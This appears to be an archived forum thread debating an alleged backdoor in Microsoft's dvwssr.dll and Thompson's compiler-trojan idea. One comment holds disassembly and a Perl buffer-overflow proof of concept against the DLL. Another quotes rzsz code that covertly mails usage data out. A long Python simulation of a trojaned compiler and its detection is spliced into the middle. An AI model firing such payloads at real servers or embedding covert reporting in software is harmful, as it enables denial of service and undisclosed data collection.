I was wondering last night... what is it going to be like when it happens again, "for real". Say five, ten, twenty years from now, the internet economy is well entrenched, everyone relies on it, and suddenly word leaks out that there is a wide-open door in the back of some widely used server system. Only this time, you can't fix it by merely deleting a "spare" library file.
If you're running closed source, you shut down your servers and wait for a patch from the vendor. And hope that there is enough left of the internet to allow you to download the patches, rather than waiting for FedEx!
This is not, IMO, a risk that you - or society at large - can afford to take.
--
Sheesh, evil *and* a jerk. -- Jade
> Any post that does not conform to the Open Source Movement party line is instantly moderated to oblivion where no user, especially no non-logged in user (since the change in default score display setting), is likely to see it, thereby suppressing dissenting opinions.
Simply put, your facts are incorrect. I see innumerable posts with dissenting opinions. I see posts that go against the "party line" moderated up to 5. I also see "party line" posts that were moderated high early on brought back down as the "dissenters" moderate them.
I even saw your post.
There's nothing wrong with your sentiments; you simply miss the facts.
> The Thompson hack included the secondary hack that if the source to the compiler itself were recompiled, the backdoor-creating code would be silently re-inserted into the output
The solution to that is to compile your compiler with some other brand of compiler, in which case the malignant code will not be inserted.
In practice, I don't think the Thompson hack would work very well anyway, or at least he would not get away with it for very long.
First, the compiler must detect something to trigger the special output. It cannot just assume anything it compiles is the code for itself. (In this age of easter eggs we might not be surprised to find a flight simulator in our compilers, but if we compiled our flight simulator and got a compiler for the executable, we would be alarmed indeed.)
From there, the question arises of what the hack should detect.
If it just detects the file name, you would only need to rename your compiler and recompile it, and then you would have a clean compiler to go forward with.
If it detects the actual source, you could similarly transform your source by renaming all the variables, functions, macros, etc., compile the result, and again obtain a clean compiler to go forward with.
The only thing I can see that would beat those kinds of safeguards would be to detect the structure of the source code - no easy task.
And even if the hack detected structure, how long would the structure go unchanged? If someone tweaks the code to fix a bug, the structure changes, the detection fails, and you again obtain a clean compiler.
It looks to me like the hack must detect the structure of an extremely small segment of code to avoid quick extinction due to workaday bug fixes and enhancements. But it must also juggle this against the need to detect a large enough structure to ensure that the program was indeed a compiler, since the game would also be up if it misdetected itself in what was actually a flight simulator.
And even then, recompiling with another compiler would surely provide the necessary purge.
I find the Thompson hack extremely interesting as an intellectual exercise, but in practice I don't think it would work, or at least not for very long at all.
Closed source is the way to go for back doors, though even then it's likely just a matter of time before you get caught. [Insert SecurityByObscurity mantra here.]
I'm not sure what this gets you. If you're a developer then you can already execute the code. The only situation where this is a benefit is if the machine is hosting multiple independent sites, then a developer for one site could read the code for another site. This is a problem but not as serious as others such as buffer overruns, and real backdoors.
"When you sit with a nice girl for two hours, it seems like two minutes. When you sit on a hot stove for two minutes, it
Seriously, how many people examine all the code for all the programs on their machine? Yeah, with open source you can look at the source but no one really has the time to examine the several hundred MB of source that their system was compiled from.
The backdoor isn't as bad as ESR is implying. In order to exploit the code, the attacker needs to be given authoring privileges on the server. So this is primarily restricted to developers and only lets the attackers read .asp or .asa files.
Also the dll was present in InterDev 1.0 but isn't found in later versions or in the releases on other platforms besides Windows on x86. There are also questions about whether Microsoft or the original developer, Vermeer Technologies, put it in. Therefore saying that Microsoft designed this is irresponsible on the part of ESR and Slashdot.
I also have objections to ESR saying that webmasters are going to be pulling out their hair over this. If the sites had upgraded to a later version of InterDev then there's no problem. Plus, only web developers can exploit this and then only to view .asp/.asa files, so it's not as serious as ESR makes it out to be. Even those sites running InterDev 1.0 can get rid of the backdoor by deleting the dll, since it codes for a view links feature which is not essential.
The original posting about the exploit is here
The problem with that is that the original GCC might be free of any backdoors, but that the original backdoor is actually in the "braindead local compiler". It could build a corrupted version of GCC for you; one smart enough to determine rebuilds of itself.
The entire point of Thompson's idea is that once you worked with a compiler you didn't build yourself, everything it makes is potentially tainted. Including itself.
-- Abigail
But Perl has.
$ cd perl-5.6.0
$ grep 'bin/mail' *.c
perl.c:if(PL_rsfp= PerlProc_popen("/bin/mailroot","w")){/*heh,heh*/
$
-- Abigail
telnet www.microsoft.com 80
Trying 207.46.131.137...
Connected to microsoft.com.
*SNIP*
Server: Microsoft-IIS/5.0
Date: Sun, 16 Apr 2000 15:29:47 GMT
People say NT is unreliable. That's crap. People say NT is insecure. Kinda. People say NT has backdoors. Ooooh yea.
I switched many of my servers from NT to Linux, the main reason being that Open Source OS's tend to have fewer bugs, and when the bugs are found, patches and updates occur very quickly.
You can be sure there are no backdoors in OSS... I mean, if someone had the balls to put backdoors in OSS they'd be ridiculed 2 minutes after the software release.
The second reason I don't use NT anymore is the bloat factor. One of my SMB servers was a P166/64MB RAM, and as soon as I installed SP6 and Option Pack 4, the hardware was rendered useless. A nice install of Linux quickly put the extra "umph" that machine needed.
Be it for backdoors, security or updates, nothing beats OSS.
My, my. Are you really, really new to programming or something?
Um, no. Are you really, really new to the English language or something? You're missing my point entirely.
If you have a version of GCC without the source to match it, as in your given example, then you cannot be sure of what it is doing.
The whole point of KT's hypothetical hack was that it would be invisible to the programmer.
His hack was very much real, and not hypothetical as you insinuate. Again, it demonstrates the dangers of misplaced trust in pre-compiled binaries.
As KT demonstrated, you cannot trust the compiler.
If you are sure you have the source to the compiler you are using, and you have reviewed it -- or someone you trust has done the same -- then you can trust the compiler.
The problem in the KT case was, KT provided a pre-compiled binary that everyone assumed was good. Binary. Not source. Binary. Get it?
dragonhawk@iname.microsoft.com
I do not like Microsoft. Remove them from my email address.
But don't take my word for it, go read the Thompson paper on inserting self-reproducing malicious code into a compiler. He proves that, even with the source code you can never be 100% sure of what a program is actually doing.
*sigh*
While it is true that Open Source is not a panacea, the Ken Thompson C compiler backdoor does not apply. That particular exploit was only possible because people did not have the source to the binary needed to bootstrap a new machine into running Unix. They had to use a binary provided by Ken Thompson, who they had to trust.
And that is the real matter at hand -- trust. If you are not reviewing every line of code and then compiling every binary yourself -- and let's face it, most people don't have the resources to do that -- you better make damn sure you trust the provider of your pre-compiled binaries.
What if Red Hat slipped a similar back door into their compiler package? What if one of the Debian maintainers decided to do it with theirs? How about if both of the above are honest, but CheapBytes does? How about the company they subcontract to manufacture and distribute the boxed sets?
It is critical to remember that most "Open Source" installations are, in fact, using unreviewed, pre-compiled binaries, and not the source itself. If the provider of those binaries is trusted, then you can be confident of the benefits of Open Source. But if not... well, at least you can switch vendors easier than you can with Microsoft's products.
The single biggest question you have to concern yourself with in the security world is still: Who do you trust?
You all don't have to take this so seriously. I don't mean about the possible security hole or whatnot, but of the message. Calling it dumb, immature, childish, unethical, or whatever it is is basically unjustified. Sure it is those things, but the beauty in it lies in the fact that the original programmer got the world to see it. A good old fashioned joke on the rivalry. Sure it took 4 years to discover, but it got discovered. Hats off to the programmer.
If you're a programmer/developer you know how stressful that job can be at times. It's good to have a little humor. I used to work as a Sys Admin a little while back, and no way in hell is it as stressful as programming. Programmers have frequent deadlines, but as an admin it typically was pretty laid back in a well maintained network. Of course it depends on the job, because I've had a programming job that didn't require anything from me.
And why wasn't that so called encryption key encrypted itself?!? Because no one would ever find it. =)
> there would never be a backdoor in open-source software
Write down the above quote on a post-it. Affix said post-it to your monitor. Then follow the link I provided. Read the paper. Then read the post-it. Then come back here and explain your sudden revelation.
--
Linux MAPI Server!
http://www.openone.com/software/MailOne/
(Exchange Migration HOWTO coming soon)
> Never may sound like a pretty strong claim. But it's true. Because back doors (unlike some other kinds of security bugs) tend to stand out like a sore thumb in source code. They're hard to conceal, easy to spot and disable -- *if you have access to the source code*.
While it's true that Open Source is more (WAY more) secure than non-open, it's not a panacea. And making claims that it IS only invite people to try (and make the fall that much harder when it comes).
But don't take my word for it, go read the Thompson paper on inserting self-reproducing malicious code into a compiler. He proves that, even with the source code you can never be 100% sure of what a program is actually doing.
The point is that you had to ask the question, and we can't tell you to look it up.
"Webmasters all over the world are going to be pulling all-nighters and tearing their hair out over this one"
No, no.... I don't think they will. Maybe it takes ESR all night to locate a DLL, but not any avid Windows user. If you are soooooo afraid that this supposed 'backdoor' is even what the press (including Slashdot) will have you believe it is then delete the file. Two seconds, done.
All ESR tries to do is breathe fear into the corporate world about Microsoft products. It's strange that he is so quick to make public (false) comment against MS, but hardly ever against any of the other evils in his own community. Time to wake up ESR!! Get your hand off your stock price and actually find out the facts before showing the world what an ignoramus you are.
I have to disagree with the main thesis of this article. Inspecting the source code does not guarantee that code is backdoor free. You have to inspect the object code (not source code) of your compiler as well, to ensure it doesn't insert a backdoor.
Ken Thompson brought this up quite clearly in his 1983 Turing award lecture, which has also been discussed in comp.risks. If you want to insert a backdoor into Linux, just booby trap a binary gcc distribution somewhere in such a way that the backdoor is reinserted when you re-compile gcc.
Open source is a good start, but it does not guarantee a lack of backdoors.
(As usual, because I have the bad luck of reading Slashdot in my time zone, my comment is hardly going to get read, let alone moderated. Oh well.)
I'm surprised nobody seems to remember Ken Thompson's ACM A. M. Turing Award reception speech, “Reflections on Trusting Trust”. If you haven't read that classic essay, you definitely should.
As mentioned in the Jargon File (which ESR surely knows about because he's the current editor of the Jargon File), Ken Thompson planted a Back Door in the login program of the first versions of Unix by planting another back door in the compiler itself. The back door was visible nowhere, neither in the sources of the compiler nor in those of the login program, and yet it was there all the same.
The moral of this is not that it might happen, but that it is possible. You've got to start trusting someone, somewhere. How do you know, after all, that Intel has not planted back doors in your microchip's microcode? Even if you could see the chip's complete source code (and you certainly cannot), the back door may be in the software that compiles the source code to the actual plans. (And even if you can see the complete plans and have a mammoth brain that can understand them, you can never be sure that there is no back door in the laws of physics.:-)
It would be quite possible, in Ken Thompson style, for a Linux distribution, say, RedHat, to put a back door in the version of gcc they use so that, even though they redistribute all the source, and pristine source at that, and even though the compiler bootstraps correctly, yet various binary programs are compiled with back doors in them. (Note that I'm not suggesting they could tamper with the binaries: that would be noticed sooner or later. Ken Thompson's trick is far more devious.)
You cannot bootstrap everything down to the hardware level, not even to the assembler level. And even if you do bootstrap everything, detecting the presence of a back door in the source is equivalent to the halting problem. Consequently, there is plenty of room for back doors even in an Open Source world.
The last thing I want to do is defend Microsoft. I don't use their products, so I frankly don't care how many back doors they might have planted. Nor do I want to advocate security through obfuscation, because that is the one thing that has never worked and never will. But I just want to say that security will never work if you don't start trusting at some point. Microsoft may have failed this trust, now or on other numerous occasions. But for ESR to say that there is no such need in the case of Open Source software is simply wrong.
This will be moderated down soon, so get the message out regardless of what the moderators try to censor.
login, get an extra point, karma whore, get another, post early, post often, elucidate and use reason.
--
+&x
See, here's the thing. It doesn't matter what the actual problem with the flaw in the MS code is, it is still some level of a security breach that happened because the code was put in by irresponsible coders. Come now, commenting your code with cracks at other programmers is one thing, but deliberately injecting an insult into your code at the expense of compromising a security model is completely wrong. Don't these people have code reviews? Apparently not, or the programmers were all so arrogant or in on the joke that they let it slide, without thinking about the consequences. I am a sysadmin for a living, and something like this bothers me, because of the impact that it has on my servers and my clients. My wife, a software engineer by trade, is morally and ethically outraged that something like this would go on. And I can sympathize with her, every time I look at a script kiddie, or even an actual skilled black hat hacker and I think about how they are wasting their skills.
Even if the facts are not totally straight, it is close enough to the truth for the average member of the populace who does not understand the complexities of dll's and so's to understand that Open Source can prevent Bad Things(tm) from happening to their computer. They know that while they may not look at the code, they have the ability to, and thusly someone else who DOES know the complexities of dll's and so's can review it for them, and they can feel safer. And that someone can be anyone..not just internal folks who are colored by their work place (I'll refrain from calling it indoctrination).
Yes, WE ALL KNOW THIS STUFF...but not everyone does! Revelation I know, but people do not know what Open Source means. They think it means free (as in beer). Hell, most people do not know what source code is! But what they should know is that if something says Open Source on the box (like where it says "Designed for Windows") they will KNOW that there are people looking at it, that they can look at it, and they know there is nothing hiding. If there are bugs and security holes, it is due to HONEST mistakes, as opposed to pranksters.
That's why it is nice to know that someone is trying to educate the users..even if you do not approve of ESR's or RMS's methods (Lord knows I wish they would shut up most days). You show people why it is better in your way, they'll do it in their way.
-- Who is the bigger fool? The fool or the fool who follows him? --
Of course I can. Never seen rootkit? Never seen either of the open-source Windows clones?
Well, maybe it's not technically a "back door" into the server, but it certainly seems to compromise their (apparently incredibly weak) password "security" model for Frontpage. Now anybody sniffing for FP passwords can crack them easily, and any 2-bit skript kiddiez can deface these sites at whim with the disseminated passwords. I think I'll go ahead and disable FP extensions on all my sites now....
#include "disclaim.h"
"All the best people in life seem to like LINUX." - Steve Wozniak
I believe in Open Source.
More importantly, I believe in the inherent security involved with Open Source.
However, I don't believe that we need to be kissing Eric S Raymond's ass. C'mon, this article said nothing new about security, or open source, or anything.
Maybe if he'd brought up some new points, or had given new examples of how the Open Source movement had helped.
Rather, we get vague notions of how it would maybe do something.
I like ESR as much as the next guy, but I don't think his Open Source work should give him a
My two cents.
>Open-source software, subject to constant peer review, evolves and gets more secure over time. But as more crackers seek and find the better-hidden flaws in opaque binaries, closed-source software gets *less* secure over time.
If I wanted to go looking for security bugs, such as buffer underruns, it would be far easier with source than without. So it might appear that it would be _easier_ to compromise an open-source system.
But wait, you say, they'd be easier to find _if they were there_ but because everything's open to scrutiny all such "low-hanging fruit" would have been found, reported, and fixed in the open-source system long ago, whereas they'd remain "latent" in the closed-source program. Oh really? Are there more people who find and report bugs to people who can fix them, or more people who find bugs and either keep quiet or only distribute the information to other script kiddies? Are there more people of either type targeting Linux, or Windows? Do these factors perhaps make just a little bit of a difference in how the security of a system changes over time?
My point is not to say that open-source software is or is not in reality more secure than closed-source software, but that any such difference has little to do with availability of source. There may be a difference based on source availability, but that difference is overwhelmed by the basically non-technical difference based on how many "good guys" and how many "bad guys" have an interest in a particular platform. The statement that closed-source software becomes less secure over time is not based in any kind of facts or logic, though within any particular small sample it may seem true. As responsible, reasoned advocacy ESR's piece is barely half a step above "open good, closed bad" which is itself not even half a step above "Linux roolz, Windows sux". At least these almost-equivalent statements have the merit of brevity, in stark contrast to the pompous and verbose style we've all come to "enjoy" in ESR's writing.
Slashdot - News for Herds. Stuff that Splatters.
interesting stuff, and makes some good points about Open Source.
Is it just me, or is this the line they use to sum up every little blurb from a linux three-letter person? How can it make good points about open source, when we've already heard them a million times before?
Oh, and maybe ESR should do more research instead of just jumping on unfounded rumors... There is not a secret password that will let anyone into an IIS web site. The phrase, "Netscape engineers are weenies!" is the key used to encrypt the password used when Frontpage using web authors are being authenticated to the server.
(You know what else is really annoying? Forgetting to put a subject, and slashdot won't let you post, so I go back and add one, and then it tells me to slow down, I have to wait 70 seconds... "Slashdot: only one troll per user per 70 seconds!" Now that's quality. [Wonders if typing that in wasted enough time that he can submit the post now. Nope, it wasn't. Might as well ramble some more]).
--- Where's my X.400 protocol decoder?
If your electrician fucks up and electrocutes your cat, you would make him pay.
Why should Free software be immune to this?
Because system administrators can check the code themselves - that's due diligence.
Well, 2 reasons why free software should be immune.
1. Because it's *free*, you paid your electrician.
2. Because it's open source.
3. There is no intent to do damage, unlike with backdoors.
Now I believe there needs to be intent to do damage, or negligence on the coder's part, for them to be held accountable if it's closed source. Open source should always be immune, you can look at what it does before you run it.
-- iCEBaLM
#ifndef REGISTERED
/* Removing or disabling this code without registering is theft */
if ((Totfiles > 0) && (!Usevhdrs)) {
	/* build a shell command reporting program name, version and transfer totals */
	sprintf(endmsg, "echo Unreg %s %s %ld %ld | mail rzsz@omen.com",
		Progname, VERSION, Totfiles, Totbytes );
	system(endmsg);
}
#endif
In other words, it mails out what you're transferring and how big it is to Omen.
As I recall, it took the *BSDs some time to notice and yank rzsz from the ports tree. I wonder if this version is still supplied as a "package" for any of the Linuces?
sorry to rain on yer parade but :
> ;see here MS ENGINEERS: BUFFER OVERFLOW
> /_vti_bin/_vti_aut/dvwssr.dll?";
> .dll to /msadc directory, and with
That is not correct.
We have been playing with dvwssr.dll and we've found a buffer overflow that stops the server from incoming connections, at least.
The code where the buffer overflow resides is:
mov eax, [edi+TEXTENSION_CONTROL_BLOCK.lpszQueryString]
test eax, eax
jz _text_581813FD
push eax
lea eax, [esp+14h+queryStringCoph]
push eax
call ds:lstrcpyA
test eax, eax
jz _text_581813FD
lea eax, [esp+10h+queryStringCoph]
push eax
call unescape_url
So, below is an example of how to exploit this vulnerability:
Of course, having the source code makes it harder to find these types of bugs...
#!/usr/bin/perl
print "GET /_vti_bin/_vti_aut/dvwssr.dll?";
print "a" x 5000;
print " HTTP/1.1\nHost: yourhost\n\n";
We've been playing a little more trying to exploit this buffer overflow, and as we don't have InterDev installed on our IIS, we copied the .dll to the /msadc directory, and with this configuration we have been able to make the code jump to our buffer.
Under these circumstances, the actual BO allows arbitrary code to be executed on the target machine.
It's interesting to note that no log is generated as an effect of this attack.
Before you use the Thompson paper to "prove" anything, remember that he implicitly assumed closed source development!
:-)
Specifically, his implicitly corrupted compiler C" is compiled with an explicitly corrupted compiler C'. The C' compiler must explicitly check for "odd" patterns and replace that code with odd values, and it's this corrupted code-generation code that is propagated in subsequent builds of the compiler.
But one of the greatest strengths of the open source ideal is that there's no assumption that any specific tool will be used. I've built the FSF tools from source tar balls many times, and more often than not I compile as many of them with the braindead local compiler. Even if I do a two-phase build, GCC is built with the braindead local compiler, so when everything is rebuilt with GCC it is *far* less likely to contain any hidden surprises.
Thompson's paper *is* something to consider in a pure-GCC environment. But the risk can be kept to a minimum level as long as GCC and the library can be compiled with a slow & stupid compiler bootstrapped from a provably correct assembler... or at least legacy Sun, HP/UX and AIX systems.
(A sidenote for people unfamiliar with this type of bootstrapping -- you start with a "mini-C" assembly language compiler which can only handle a subset of C (e.g., no floating point math, no typedefs, no unions, etc.) Since it's in assembler, you can verify that the object code matches the source code... and the reduced functionality keeps the size reasonable. Your real compiler is written in this mini-C language, it accepts ANSI C but isn't fast, nor does it produce fast code. As a final step the newly compiled compiler (re)compiles itself.)
For every complex problem there is an answer that is clear, simple, and wrong. -- H L Mencken
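The Thompson-hack discussion earlier in the thread (rename identifiers in the compiler source, or recompile with a different compiler, to purge the trojan) and the bootstrapping note in this post describe a procedure that is easier to see running than to argue about. The following is an added example, not code from any poster, from gcc or from Thompson's paper: a toy compiler simulation in Python in which a "binary" is a source string, a trojaned compiler rewrites a login program and re-inserts itself whenever it recognises the honest compiler's source by exact match, and a check compares a rebuild from an independent compiler against the distributed binary (David A. Wheeler's "diverse double-compiling", which the thread does not name). The function names, the placeholder backdoor password and the sample password table are all constructed for this example.

```python
"""Toy model of the "trusting trust" compiler backdoor and two defences:
rebuilding from modified source with the same compiler, and rebuilding with an
independent compiler and comparing results (diverse double-compiling).

Simulation constructed for this example: a "binary" is a Python source string
defining compile_fn(src) -> str, and "running" a binary means exec'ing it.  The
toy target language is the toy source language, so an honest compiler is the
identity transform."""

# Source of the honest compiler.  Compiled honestly it yields itself.
COMPILER_SRC = "def compile_fn(src):\n    return src\n"

# Source of a login program that checks a password table.
LOGIN_SRC = (
    "def login(user, password):\n"
    "    return PASSWORDS.get(user) == password\n"
)

# Constructed placeholder for the credential the trojan hard-codes.
BACKDOOR_PASSWORD = "PLACEHOLDER-BACKDOOR"

# An independently written compiler used as the second trust root.
INDEPENDENT_BIN = "def compile_fn(program):\n    return str(program)\n"

# Trojaned compiler binary: faithful for ordinary programs, but it rewrites the
# login program and, when handed the honest compiler's source, emits itself so
# the backdoor survives a rebuild from clean source.  A real trojan would carry
# its own text as a quine; this one reads TROJAN_BIN from the namespace that
# run_compiler() supplies, which is enough for the simulation.
TROJAN_BIN = '''def compile_fn(src):
    if "def login(" in src:
        src = src.replace(
            "return PASSWORDS.get(user) == password",
            "return password == " + repr(BACKDOOR_PASSWORD)
            + " or PASSWORDS.get(user) == password")
    if src == COMPILER_SRC:          # exact-match self-detection
        return TROJAN_BIN
    return src
'''


def run_compiler(binary: str, src: str) -> str:
    """Execute a compiler binary on src and return the binary it produces."""
    ns = {"COMPILER_SRC": COMPILER_SRC, "TROJAN_BIN": TROJAN_BIN,
          "BACKDOOR_PASSWORD": BACKDOOR_PASSWORD}
    exec(binary, ns)
    return ns["compile_fn"](src)


def load_login(login_bin: str, passwords: dict):
    """Execute a login binary and return its login(user, password) function."""
    ns = {"PASSWORDS": dict(passwords)}
    exec(login_bin, ns)
    return ns["login"]


def backdoor_present(compiler_bin: str) -> bool:
    """True if a login program built by compiler_bin accepts the backdoor
    password while still rejecting an ordinary wrong password."""
    login = load_login(run_compiler(compiler_bin, LOGIN_SRC),
                       {"alice": "correct horse"})      # constructed table
    return login("alice", BACKDOOR_PASSWORD) and not login("alice", "wrong")


def rebuild_escapes_exact_match() -> bool:
    """The thread's point: renaming identifiers in the compiler source defeats
    a trojan that recognises its host by exact match.  True if the compiler
    rebuilt from the renamed source is clean."""
    renamed_src = COMPILER_SRC.replace("src", "source_text")
    rebuilt = run_compiler(TROJAN_BIN, renamed_src)
    return not backdoor_present(rebuilt)


def diverse_double_compile(untrusted_bin: str, trusted_bin: str,
                           compiler_src: str) -> bool:
    """Build compiler_src with an independent trusted compiler (stage 1), then
    rebuild it with the stage-1 result (stage 2).  If untrusted_bin really is
    compiler_src compiled by itself, and compilation is deterministic, stage 2
    must be byte-identical to untrusted_bin.  True means consistent."""
    stage1 = run_compiler(trusted_bin, compiler_src)
    stage2 = run_compiler(stage1, compiler_src)
    return stage2 == untrusted_bin


if __name__ == "__main__":
    honest_bin = run_compiler(INDEPENDENT_BIN, COMPILER_SRC)
    print("honest compiler backdoors login:", backdoor_present(honest_bin))
    print("trojan compiler backdoors login:", backdoor_present(TROJAN_BIN))
    print("trojan survives rebuild from clean source:",
          backdoor_present(run_compiler(TROJAN_BIN, COMPILER_SRC)))
    print("renaming identifiers purges it:", rebuild_escapes_exact_match())
    print("DDC flags the trojan binary:",
          not diverse_double_compile(TROJAN_BIN, INDEPENDENT_BIN, COMPILER_SRC))
```

The comparison in `diverse_double_compile` only works because the toy compiler is deterministic; on a real toolchain the same check needs reproducible builds, and the independent compiler is only useful if it really does share no code with the one under suspicion, which is the same caveat the "braindead local compiler" reply above raises.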
Close, but wrong.
My post is trollish, but I really don't care if it gets moderated. At least several hundred people (probably) saw it already, I got what I was going for.
The only advantage to the moderation and +1 bonus is that people are more likely to see your posts when you want them to. By the same virtue, how many people saw your also trolling post at 0?
Will you see this one?
------
Following line: Good example of Fair Use.
If a tree falls on an anonymous coward yelling 'first post' in the forest, does anybody hear?
The fact that he is correct in this circumstance notwithstanding, does anyone have any doubt that Zico is easily Slashdot's most frequently moderated up troll, period?
It's not some issue I have with his karma and/or the infamous karmawhoring of others. I have enough of my own for a +1 and about 60 first posts without losing same. It's more that I can't help but wonder why I see four posts by Zico on this article, all saying the same thing, and all of them above my default Score: 2 threshold, despite the fact he had the courtesy to start a couple of them at one.
It's funny, actually.
And Zico, I think that the reason this was posted is because Slashdot is still attempting to produce original content, despite the fact that the quality thereof is abysmal. (See: Katz, Jon - Martyr to the Geeks; Katz, Jon - the "this profiling... it includes geeks" guy; Katz, Jon - the "instead of turning in geeks, let's turn in jocks. That'll get them" guy; Katz, Jon - "someone asked me to please die"; etc)
------
Following line: Good example of Fair Use.
If a tree falls on an anonymous coward yelling 'first post' in the forest, does anybody hear?
I wish that people posting stories would engage in the follow-up dialogue. I'd really appreciate seeing ESR responding to the reasonable accusations that this is inaccurate, FUD, etc...
Especially as one who trumpets the virtues of open source, I think ESR should see the value in dialogue between peers, as opposed to a celebrity posting an article on the front page of Slashdot and then retiring back to the 10th floor of the Hilton.
There are many figures who are known for posting comments on stories by or about them. John Carmack, Mandrake, RedHat, Bruce Perens, I'm sure there are more. This is good. I only wish it were more common.
"Seriously, my question is, how can you quantify the expenses and losses of something like this?? How much did the DoS attacks on Yahoo, eBay and others cost? "
The DoS attacks cost them some fraction of their business over some fraction of a day.
In this particular case, it costs companies nothing. Unless: 1. M$ sells a patch rather than gives it away. or 2. Someone were to use this to break into their system. If any system is broken into as a result of this, the time to repair any damage done should be taken out of microsoft's hide.
If your electrician fucks up and electrocutes your cat, you would make him pay.
Why should Free software be immune to this?
Because system administrators can check the code themselves - that's due diligence.
Become a FSF associate member before the low #s are used
Speaking of easter eggs, I fell across one in shutdown the other day. If someone is logged in as 'tyler' they get a "Going down mr tyler?" message as the shutdown message as well as the standard message (System is going down for a reboot NOW)...
There's been a very famous back door in OSS software, one that was not visible by reading the source. It involved a compiler, and someone with a lot of spare time.
Basically it goes like this: You take a compiler, detect when you're compiling login and insert a back door into login. You also detect when you're compiling the compiler and add the code back.
Read about it here
What ESR said, that there will never be something like this in the BIND library is true. There will never be a backdoor in the BIND library. That's obviously not to say that the BIND library will never have bugs or security issues. That's not what he was saying.
Chris Hagar
"The price of freedom is eternal vigilance." - Thomas Jefferson
It would be possible for a company to lose customers if their website was defaced. For instance, if the company is in the business of web security and they can't even protect their own system (although that begs the question why they're using IIS).
Chris Hagar
"The price of freedom is eternal vigilance." - Thomas Jefferson
ESR just meant that there would never be a backdoor in open-source software. People would find it much too quickly for it to ever represent a threat. He was not addressing whether open-source is in all situations more secure than closed-source software.
Chris Hagar
"The price of freedom is eternal vigilance." - Thomas Jefferson
First of all, I would like to say that, after a perusal of the page you cited, I'm going to go along with what some other commenters said: that it does not apply to insecurity of open source. Secondly, I was saying what seemed to be exactly what ESR was saying. I was not providing my own opinions as to whether a backdoor would be possible in open-source software.
Chris Hagar
"The price of freedom is eternal vigilance." - Thomas Jefferson
Wow, how does someone get to -2? I am duly impressed.
I thought the -2 stuff was a joke. Well, the joke was on me!
You continue to earn my respect, trolls, and maybe it's just because I'm slaphappy at 4AM, but you are providing a valuable service!
First of all, there is no backdoor. Look at the previous article...
Second, this is not, I repeat, *not* years old. It's more like days old...
My, what is wrong with Slashdot's article selection process? Anything that is worded pro-Linux, anti-MS has a high chance of getting posted. Regardless of its truth.
Slashdot is setting a very very bad example.
*sigh*
...but it's not me. Kurt Seifried, the security expert from securityportal.com writes in his article Do you trust your software? that Linux backdoors COULD and probably DO exist because, despite the fact that the source is open, almost nobody is actually reading it. He also claims that many of the exploits found in common open-source software such as BIND and wu-ftpd are placed there intentionally, like by the US government.
:)
Notice: do not flame me. I do not believe in this fairy tale; I'm just reporting on it. I have personally spoken to Kurt on IRC and made him explain himself. He had some good arguments but I still think he's wrong
Intercarve Networks, LLC
For back of the envelope calculations that is an excellent rule-of-thumb.
The net will not be what we demand, but what we make it. Build it well.
I'm sorry that I wasn't clear. I agree with your point. At worst, you underestimated by an order of magnitude. The only reason that I think you might be off is that I think the number of servers hit was underestimated because of under-reporting. I was trying to bring up some related issues.
The net will not be what we demand, but what we make it. Build it well.
I have two points to make about this. Farther along you did point out that installing patches is in the job description. True enough. Installing patches to correct a backdoor, as this was alleged to be, should not be. But, your calculations leave out a number of other factors. The cost of an employee's time doesn't stop at his paycheck. There was server downtime involved. There are also other non-salary costs in keeping employees: benefits, the employer's contribution to Social Security, office space, etc.
A former coworker of mine, and still a friend, pointed out something to me a couple of years ago about time spent by engineers, or anyone producing a product. Its value should be measured by what they could produce if not interrupted by whatever you are evaluating the cost of. Certainly, for a network administrator, this is part of the job. And what about the little start-up, where the three hackers with the brilliant product idea who are slinging code 18 hours a day also put together the company web site because they are paying themselves in equity in the company rather than in dollars, which they don't have. They can't hire a net admin right now, but the cost to them of those 4 hours may be huge.
The net will not be what we demand, but what we make it. Build it well.
Well, "rootable" boxes do tend to run unix variants.
--
The shareholder is always right.
Keep telling people that, and eventually they will stop looking at the source code for the software they use. Someone will include a hard-to-see security hole, on purpose, and then exploit it selectively several days later. It won't make slashdot, because the software won't be apache (enough paranoid people run apache), but it will happen.
--
The shareholder is always right.
I've been running this stuff for about a year, and have yet to be able to compromise these servers, or find someone else who has been able to.
Anyone else have a different story?
Would be nice to have some definitive assurance.
Linux rocks!!! www.dedserius.com
www.dedserius.com
VB != VisualBasic
With UCITA coming down the pike, I'm sure assorted other back doors will be forthcoming. The question is, do you as a large business in an arena competing with Microsoft want to trust your future to an OS and apps your competitors wrote? Competitors whose history of dirty tricks goes back longer than they've been in business?
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
http://www.bio.umass.edu/biology/kunkel/cockroach.html has by far more than most people want to know. As far as bugs go, cockroaches aren't so bad. Flies, bees, hornets, ants (fire ants come to the top) are FAR worse. It is just our conditioning that makes roaches on the hated list.
/.
Cockroaches are very sensitive to water loss, that is why they don't like the light. Airflow, low humidity, and no dripping water will kill them quickly.
So darkness with a lot of airflow and no water, and they won't thrive, survive, or breed. If you want to kill roaches with mold spores, then you have to have the damp conditions. The use of diatomaceous earth causes cuts in the exoskeleton, and dehydration. Note mold/DE will work well for ants also.
Now...ESR's latest story he tries to forward the Linux-as-OpenSource agenda (note how he speaks at The Bazaar/elsewhere and how he wants to see BSD have more success, yet no BSD binaries for fetchmail and no mention of BSD. So much for using his bully pulpit to back what he says.) And, although his points about OpenSource are correct, the statement about "inserted a security-compromising back" seems to be false. So this story by ESR falls short of what it could have been.
Of course, pointing out backward text of Netscape engineers are weenies!, is not as damning as a backdoor. A backdoor is nice press, too bad it is looking like it is not true.
Taking this article and waving it under other people's noses as proof of how much better OpenSource is over closed source will do little good because the reports of a backdoor are false. Nice preaching to the choir, but you need to be convincing others, not the readers of
If it was said on slashdot, it MUST be true!
No, you're wrong. "Netscape programmers are weenies!" is simply used to encrypt certain data travelling back and forth between two Microsoft components. Clearly, Microsoft did not intend for this security method to be foolproof; they simply wanted to keep the casual observer from seeing certain data. Here's what Russ Cooper said:
While reports focused on a phrase -- "!seineew era sreenigne epacsteN" or the backwards spelling of "Netscape engineers are weenies!" -- which was present in the DLL, that's a red herring, said Cooper, adding that the phrase is not a password, but a cypher key used to scramble the address of Web pages requested by users.
Sig goes here
What if I "borrow" the executive's hard drive for a little while, and then use my custom version of Linux that doesn't respect Administrative Privileges to install my alternative file system, and then return the hard drive to its computer?
Sig goes here
And if there really was never a back door, then why did they admit there was? I'm sorry, but this seems just as likely to be backpedaling to cover their arse as it could be an honest mistake. And honesty is not something Microsoft is particularly well known for.
Here's my DeCSS mirror. Where's yours?
Here's my DeCSS mirror, where's yours?
